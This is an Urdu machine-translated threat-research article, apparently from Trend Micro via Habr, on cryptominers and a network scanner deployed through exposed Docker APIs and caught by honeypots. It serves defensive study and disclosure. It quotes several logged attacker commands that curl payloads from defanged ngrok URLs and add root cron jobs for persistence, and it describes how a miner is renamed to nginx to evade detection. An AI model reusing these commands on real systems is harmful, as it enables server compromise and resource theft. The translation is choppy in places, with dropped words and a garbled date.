ہم نے ہنی پاٹ کنٹینرز کا استعمال کرتے ہوئے جمع کیے گئے ڈیٹا کا تجزیہ کیا، جسے ہم نے خطرات کو ٹریک کرنے کے لیے بنایا تھا۔ اور ہم نے Docker Hub پر کمیونٹی کی طرف سے شائع کردہ تصویر کا استعمال کرتے ہوئے بدمعاش کنٹینرز کے طور پر تعینات ناپسندیدہ یا غیر مجاز کرپٹو کرنسی کان کنوں سے اہم سرگرمی کا پتہ لگایا۔ اس تصویر کو ایک سروس کے حصے کے طور پر استعمال کیا گیا ہے جو بدنیتی پر مبنی کرپٹو کرنسی کان کنوں کو فراہم کرتی ہے۔
مزید برآں، کھلے پڑوسی کنٹینرز اور ایپلی کیشنز میں گھسنے کے لیے نیٹ ورکس کے ساتھ کام کرنے کے پروگرام نصب کیے جاتے ہیں۔
ہم اپنے ہنی پاٹس کو ویسے ہی چھوڑ دیتے ہیں، یعنی ڈیفالٹ سیٹنگز کے ساتھ، بغیر کسی حفاظتی اقدامات یا بعد میں اضافی سافٹ ویئر کی تنصیب کے۔ براہ کرم نوٹ کریں کہ Docker کے پاس غلطیوں اور سادہ خطرات سے بچنے کے لیے ابتدائی سیٹ اپ کے لیے سفارشات ہیں۔ لیکن استعمال شدہ ہنی پاٹس کنٹینرز ہیں، جو کنٹینرائزیشن پلیٹ فارم پر ہونے والے حملوں کا پتہ لگانے کے لیے ڈیزائن کیے گئے ہیں، نہ کہ کنٹینرز کے اندر موجود ایپلی کیشنز۔
پتہ چلنے والی بدنیتی پر مبنی سرگرمی بھی قابل ذکر ہے کیونکہ اسے خطرات کی ضرورت نہیں ہے اور یہ Docker ورژن سے بھی آزاد ہے۔ غلط طریقے سے تشکیل شدہ، اور اس وجہ سے کھلی، کنٹینر کی تصویر تلاش کرنا ہی حملہ آوروں کو بہت سے کھلے سرورز کو متاثر کرنے کی ضرورت ہے۔
غیر بند ڈوکر API صارف کو وسیع رینج انجام دینے کی اجازت دیتا ہے۔ ، بشمول چلنے والے کنٹینرز کی فہرست حاصل کرنا، مخصوص کنٹینر سے لاگ حاصل کرنا، شروع کرنا، روکنا (بشمول زبردستی) اور یہاں تک کہ مخصوص ترتیبات کے ساتھ مخصوص تصویر سے نیا کنٹینر بنانا۔
بائیں طرف میلویئر کی ترسیل کا طریقہ ہے۔ دائیں طرف حملہ آور کا ماحول ہے، جو تصویروں کو ریموٹ رول آؤٹ کرنے کی اجازت دیتا ہے۔
3762 اوپن ڈوکر APIs کی ملک کے لحاظ سے تقسیم۔ شوڈن تلاش کی بنیاد پر مورخہ 12.02.2019/XNUMX/XNUMX
اٹیک چین اور پے لوڈ کے اختیارات
نقصان دہ سرگرمی کا پتہ نہ صرف شہد کے برتنوں کی مدد سے لگایا گیا تھا۔ شوڈن کے ڈیٹا سے پتہ چلتا ہے کہ جب سے ہم نے Monero cryptocurrency مائننگ سوفٹ ویئر کو تعینات کرنے کے لیے پل کے طور پر استعمال ہونے والے غلط کنفیگرڈ کنٹینر کی چھان بین کی ہے تو بے نقاب ڈوکر APIs (دوسرا گراف دیکھیں) کی تعداد میں اضافہ ہوا ہے۔ گزشتہ سال اکتوبر میں (2018، موجودہ اعداد و شمار تقریبا. مترجم) صرف 856 اوپن APIs تھے۔
ہنی پاٹ لاگز کی جانچ سے پتہ چلتا ہے کہ کنٹینر کی تصویر کا استعمال بھی اس کے استعمال سے وابستہ تھا۔ ، محفوظ کنکشن قائم کرنے یا عوامی طور پر قابل رسائی پوائنٹس سے مخصوص پتوں یا وسائل تک ٹریفک کو آگے بھیجنے کا ایک ٹول (مثال کے طور پر لوکل ہوسٹ)۔ یہ حملہ آوروں کو کھلے سرور پر پے لوڈ فراہم کرتے وقت متحرک طور پر URLs بنانے کی اجازت دیتا ہے۔ ذیل میں نوشتہ جات سے کوڈ کی مثالیں ہیں جو ngrok سروس کے غلط استعمال کو ظاہر کرتی ہیں:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”جیسا کہ آپ دیکھ سکتے ہیں، اپ لوڈ کردہ فائلیں مسلسل بدلتے ہوئے URLs سے ڈاؤن لوڈ کی جاتی ہیں۔ ان URLs کی میعاد ختم ہونے کی تاریخ مختصر ہے، اس لیے پے لوڈز کو میعاد ختم ہونے کی تاریخ کے بعد ڈاؤن لوڈ نہیں کیا جا سکتا۔
پے لوڈ کے دو اختیارات ہیں۔ پہلا لینکس (Coinminer.SH.MALXMR.ATNO کے طور پر بیان کردہ) کے لیے ایک مرتب کردہ ELF کان کن ہے جو کان کنی کے تالاب سے جڑتا ہے۔ دوسرا اسکرپٹ (TrojanSpy.SH.ZNETMAP.A) ہے جو نیٹ ورک رینج کو اسکین کرنے اور پھر نئے اہداف کی تلاش کے لیے استعمال ہونے والے نیٹ ورک کے مخصوص ٹولز حاصل کرنے کے لیے ڈیزائن کیا گیا ہے۔
ڈراپر اسکرپٹ دو متغیرات کو سیٹ کرتا ہے، جو پھر کریپٹو کرنسی مائنر کو تعینات کرنے کے لیے استعمال ہوتے ہیں۔ HOST متغیر URL پر مشتمل ہے جہاں بدنیتی پر مبنی فائلیں واقع ہیں، اور RIP متغیر کان کن کی فائل کا نام (حقیقت میں، ہیش) ہے جسے تعینات کیا جانا ہے۔ ہر بار جب ہیش متغیر تبدیل ہوتا ہے تو HOST متغیر تبدیل ہوتا ہے۔ اسکرپٹ یہ بھی چیک کرنے کی کوشش کرتا ہے کہ حملہ شدہ سرور پر کوئی اور کرپٹو کرنسی کان کن نہیں چل رہا ہے۔
HOST اور RIP متغیرات کی مثالیں، نیز ایک کوڈ کا ٹکڑا یہ چیک کرنے کے لیے استعمال کیا جاتا ہے کہ کوئی اور کان کن نہیں چل رہا ہے۔
مائنر شروع کرنے سے پہلے، اس کا نام تبدیل کر کے nginx رکھا گیا ہے۔ اس اسکرپٹ کے دوسرے ورژن کان کن کا نام بدل کر دیگر جائز خدمات پر رکھ دیتے ہیں جو لینکس کے ماحول میں موجود ہو سکتی ہیں۔ یہ عام طور پر چلنے والے عمل کی فہرست کے خلاف چیک کو نظرانداز کرنے کے لیے کافی ہوتا ہے۔
سرچ اسکرپٹ میں بھی خصوصیات ہیں۔ یہ ضروری ٹولز کو تعینات کرنے کے لیے اسی یو آر ایل سروس کے ساتھ کام کرتا ہے۔ ان میں zmap بائنری ہے، جو نیٹ ورکس کو اسکین کرنے اور کھلی بندرگاہوں کی فہرست حاصل کرنے کے لیے استعمال ہوتی ہے۔ اسکرپٹ ایک اور بائنری کو بھی لوڈ کرتی ہے جو پائی جانے والی خدمات کے ساتھ تعامل کرنے اور ان سے بینرز وصول کرنے کے لیے استعمال کی جاتی ہے تاکہ ملی سروس کے بارے میں اضافی معلومات کا تعین کیا جا سکے (مثال کے طور پر، اس کا ورژن)۔
اسکرپٹ اسکین کرنے کے لیے کچھ نیٹ ورک رینجز کا بھی پہلے سے تعین کرتا ہے، لیکن یہ اسکرپٹ کے ورژن پر منحصر ہے۔ یہ اسکین چلانے سے پہلے خدمات سے ٹارگٹ پورٹس بھی سیٹ کرتا ہے — اس معاملے میں، ڈوکر۔
جیسے ہی ممکنہ اہداف ملتے ہیں، خود بخود ان سے بینرز ہٹا دیے جاتے ہیں۔ اسکرپٹ خدمات، ایپلی کیشنز، اجزاء یا دلچسپی کے پلیٹ فارمز کے لحاظ سے اہداف کو بھی فلٹر کرتا ہے: Redis، Jenkins، Drupal، MODX، ، Docker 1.16 کلائنٹ اور Apache CouchDB۔ اگر اسکین شدہ سرور ان میں سے کسی سے میل کھاتا ہے، تو اسے ٹیکسٹ فائل میں محفوظ کیا جاتا ہے، جسے حملہ آور بعد میں تجزیہ اور ہیکنگ کے لیے استعمال کرسکتے ہیں۔ یہ ٹیکسٹ فائلیں حملہ آوروں کے سرورز پر متحرک لنکس کے ذریعے اپ لوڈ کی جاتی ہیں۔ یعنی ہر فائل کے لیے الگ یو آر ایل استعمال کیا جاتا ہے، جس کا مطلب ہے کہ بعد میں رسائی مشکل ہے۔
حملہ ویکٹر ایک ڈاکر امیج ہے، جیسا کہ کوڈ کے اگلے دو ٹکڑوں میں دیکھا جا سکتا ہے۔
سب سے اوپر ایک جائز سروس کا نام تبدیل کر رہا ہے، اور نیچے یہ ہے کہ نیٹ ورکس کو اسکین کرنے کے لیے کس طرح zmap کا استعمال کیا جاتا ہے
سب سے اوپر پہلے سے طے شدہ نیٹ ورک رینجز ہیں، نیچے خدمات کی تلاش کے لیے مخصوص پورٹس ہیں، بشمول ڈوکر
اسکرین شاٹ سے پتہ چلتا ہے کہ الپائن کرل امیج کو 10 ملین سے زیادہ بار ڈاؤن لوڈ کیا جا چکا ہے۔
الپائن لینکس اور کرل کی بنیاد پر، مختلف پروٹوکولز پر فائلوں کی منتقلی کے لیے وسائل کے لحاظ سے موثر CLI ٹول، آپ بنا سکتے ہیں۔ . جیسا کہ آپ پچھلی تصویر میں دیکھ سکتے ہیں، اس تصویر کو پہلے ہی 10 ملین سے زیادہ بار ڈاؤن لوڈ کیا جا چکا ہے۔ ڈاؤن لوڈ کی ایک بڑی تعداد کا مطلب یہ ہوسکتا ہے کہ اس تصویر کو بطور انٹری پوائنٹ استعمال کیا جائے؛ اس تصویر کو چھ ماہ سے زیادہ پہلے اپ ڈیٹ کیا گیا تھا؛ صارفین نے اس ریپوزٹری سے دوسری تصاویر اتنی کثرت سے ڈاؤن لوڈ نہیں کیں۔ ڈوکر میں - کنٹینر کو چلانے کے لیے کنفیگر کرنے کے لیے استعمال ہونے والی ہدایات کا ایک سیٹ۔ اگر انٹری پوائنٹ کی ترتیبات غلط ہیں (مثال کے طور پر، کنٹینر کو انٹرنیٹ سے کھلا چھوڑ دیا گیا ہے)، تو تصویر کو حملہ آور کے طور پر استعمال کیا جا سکتا ہے۔ حملہ آور اس کا استعمال پے لوڈ ڈیلیور کرنے کے لیے کر سکتے ہیں اگر انہیں کوئی غلط کنفیگر شدہ یا کھلا ہوا کنٹینر غیر تعاون یافتہ چھوڑ دیا جائے۔
یہ نوٹ کرنا ضروری ہے کہ یہ تصویر (الپائن کرل) خود بدنیتی پر مبنی نہیں ہے، لیکن جیسا کہ آپ اوپر دیکھ سکتے ہیں، اس کا استعمال بدنیتی پر مبنی افعال انجام دینے کے لیے کیا جا سکتا ہے۔ اسی طرح کی ڈاکر امیجز کو بدنیتی پر مبنی سرگرمیاں انجام دینے کے لیے بھی استعمال کیا جا سکتا ہے۔ ہم نے ڈوکر سے رابطہ کیا اور اس معاملے پر ان کے ساتھ کام کیا۔
سفارشات
رہتا ہے بہت سی کمپنیوں کے لیے، خاص طور پر ان پر عمل درآمد کرنے والی ، تیزی سے ترقی اور ترسیل پر توجہ مرکوز کی۔ آڈیٹنگ اور مانیٹرنگ کے قوانین کی تعمیل کرنے کی ضرورت، ڈیٹا کی رازداری کی نگرانی کرنے کی ضرورت کے ساتھ ساتھ ان کی عدم تعمیل سے ہونے والے بہت زیادہ نقصان سے سب کچھ بڑھ گیا ہے۔ ڈیولپمنٹ لائف سائیکل میں سیکیورٹی آٹومیشن کو شامل کرنے سے نہ صرف آپ کو ایسے حفاظتی سوراخوں کو تلاش کرنے میں مدد ملتی ہے جو بصورت دیگر ناقابل شناخت رہ سکتے ہیں، بلکہ یہ آپ کو غیر ضروری کام کے بوجھ کو کم کرنے میں بھی مدد کرتا ہے، جیسے کہ کسی ایپلیکیشن کے تعینات ہونے کے بعد ہر دریافت شدہ خطرے یا غلط کنفیگریشن کے لیے اضافی سافٹ ویئر کی تعمیرات کو چلانا۔
اس مضمون میں زیر بحث واقعہ شروع سے ہی حفاظت کو مدنظر رکھنے کی ضرورت پر روشنی ڈالتا ہے، بشمول درج ذیل سفارشات:
- سسٹم ایڈمنسٹریٹرز اور ڈویلپرز کے لیے: ہمیشہ اپنی API سیٹنگز کو چیک کریں تاکہ یہ یقینی بنایا جا سکے کہ ہر چیز صرف ایک مخصوص سرور یا اندرونی نیٹ ورک سے درخواستیں قبول کرنے کے لیے ترتیب دی گئی ہے۔
- کم از کم حقوق کے اصول پر عمل کریں: یقینی بنائیں کہ کنٹینر کی تصاویر پر دستخط اور تصدیق شدہ ہیں، اہم اجزاء (کنٹینر لانچ سروس) تک رسائی کو محدود کریں اور نیٹ ورک کنکشن میں انکرپشن شامل کریں۔
- پیروی اور حفاظتی طریقہ کار کو فعال کریں، جیسے اور بلٹ ان .
- کنٹینر میں چلنے والے عمل کے بارے میں اضافی معلومات حاصل کرنے کے لیے رن ٹائمز اور تصاویر کی خودکار اسکیننگ کا استعمال کریں (مثال کے طور پر، جعل سازی کا پتہ لگانے یا کمزوریوں کی تلاش کے لیے)۔ ایپلیکیشن کنٹرول اور سالمیت کی نگرانی سرورز، فائلوں اور سسٹم کے علاقوں میں غیر معمولی تبدیلیوں کو ٹریک کرنے میں مدد کرتی ہے۔
Trendmicro DevOps ٹیموں کو محفوظ طریقے سے بنانے، تیزی سے رول آؤٹ کرنے اور کہیں بھی لانچ کرنے میں مدد کرتا ہے۔ ٹرینڈ مائیکرو ایک تنظیم کی DevOps پائپ لائن میں طاقتور، ہموار، اور خودکار سیکیورٹی فراہم کرتا ہے اور متعدد خطرات سے بچاؤ فراہم کرتا ہے۔ رن ٹائم پر جسمانی، ورچوئل اور کلاؤڈ ورک بوجھ کی حفاظت کے لیے۔ اس کے ساتھ کنٹینر سیکیورٹی بھی شامل ہوتی ہے۔ и ، جو ڈوکر کنٹینر کی امیجز کو ڈیولپمنٹ پائپ لائن میں کسی بھی مقام پر میلویئر اور کمزوریوں کے لیے اسکین کرتا ہے تاکہ ان کے تعینات ہونے سے پہلے خطرات کو روکا جا سکے۔
سمجھوتہ کے آثار
متعلقہ ہیش:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
پر پریکٹس کرنے والے مقررین یہ بتاتے ہیں کہ امکان کو کم کرنے یا اوپر بیان کی گئی صورت حال کی موجودگی سے مکمل طور پر بچنے کے لیے پہلے کون سی سیٹنگیں کرنے کی ضرورت ہے۔ اور 19-21 اگست کو ایک آن لائن انٹینسیو میں آپ ایک گول میز پر ساتھیوں اور مشق کرنے والے اساتذہ کے ساتھ ان اور اسی طرح کے حفاظتی مسائل پر بات کر سکتے ہیں، جہاں ہر کوئی تجربہ کار ساتھیوں کے درد اور کامیابیوں کو سن سکتا ہے۔
ماخذ: www.habr.com